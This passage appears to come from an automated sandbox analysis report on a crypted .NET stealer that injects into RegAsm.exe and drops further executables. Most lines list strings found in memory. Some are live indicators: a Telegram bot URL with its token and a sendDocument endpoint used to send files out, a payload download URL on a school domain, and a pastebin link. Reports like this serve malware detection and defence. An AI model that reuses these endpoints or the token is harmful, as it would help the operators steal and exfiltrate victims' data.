                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 0000000D.00000002.2208257467.000000000335D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smkn2sumbawabesar.sch.id
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000003220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                      Source: 66dcad8f5f33a_crypted.exe, 00000000.00000002.1477865176.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1659124190.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: filename.exe, 0000000D.00000002.2208257467.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: filename.exe, 0000000D.00000002.2208257467.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocument
                      Source: filename.exe, 0000000D.00000002.2208257467.000000000339C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7519321746:AAGYAZdkHTqE4LvUc5fDNQGiIRvfmzNMLzk/sendDocumentT
                      Source: filename.exe, 0000000D.00000002.2210743306.0000000004357000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 0000000D.00000000.1656261627.0000000000DE2000.00000002.00000001.01000000.00000009.sdmp, Path.exe.13.drString found in binary or memory: https://ipinfo.io/ip-https://api.ipify.org/
                      Source: filename.exe, 0000000D.00000002.2208257467.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: Path.exe, 00000011.00000002.2263127752.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/EgQVHrqH
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smkn2sumbawabesar.sch.id
                      Source: RegAsm.exe, 0000000B.00000002.1660156451.00000000031D7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1660156451.00000000031B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smkn2sumbawabesar.sch.id/1.exe
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownHTTPS traffic detected: 194.163.35.141:443 -> 192.168.2.7:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49710 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpECCC.tmpJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpECBC.tmpJump to dropped file

                      System Summary

                      barindex
                      .NET source code contains very large array initializations
                      Source: 66dcad8f5f33a_crypted.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                      .NET source code contains very large strings
                      Source: filename.exe.11.dr, D-LUa.csLong String: Length: 34999
                      Source: filename.exe.11.dr, D-LUa.csLong String: Length: 34951
                      Source: filename.exe.11.dr, D-LUa.csLong String: Length: 42999
                      Source: filename.exe.11.dr, D-LUa.csLong String: Length: 42999
                      Source: filename.exe.11.dr, D-LUa.csLong String: Length: 35034
                      Source: Path.exe.13.dr, D-LUa.csLong String: Length: 34999
                      Source: Path.exe.13.dr, D-LUa.csLong String: Length: 34951
                      Source: Path.exe.13.dr, D-LUa.csLong String: Length: 42999
                      Source: Path.exe.13.dr, D-LUa.csLong String: Length: 42999
                      Source: Path.exe.13.dr, D-LUa.csLong String: Length: 35034
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, D-LUa.csLong String: Length: 34999
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, D-LUa.csLong String: Length: 34951
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, D-LUa.csLong String: Length: 42999
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, D-LUa.csLong String: Length: 42999
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, D-LUa.csLong String: Length: 35034
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeFile dump: Path.exe.13.dr 768436224Jump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0537DC7411_2_0537DC74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0554694811_2_05546948
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_05547C2011_2_05547C20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0554004011_2_05540040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0554000611_2_05540006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_05547C1011_2_05547C10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068F67D811_2_068F67D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068FA3E811_2_068FA3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068F3F5011_2_068F3F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068FA3D811_2_068FA3D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068F6FE811_2_068F6FE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068F6FF811_2_068F6FF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701946011_2_07019460
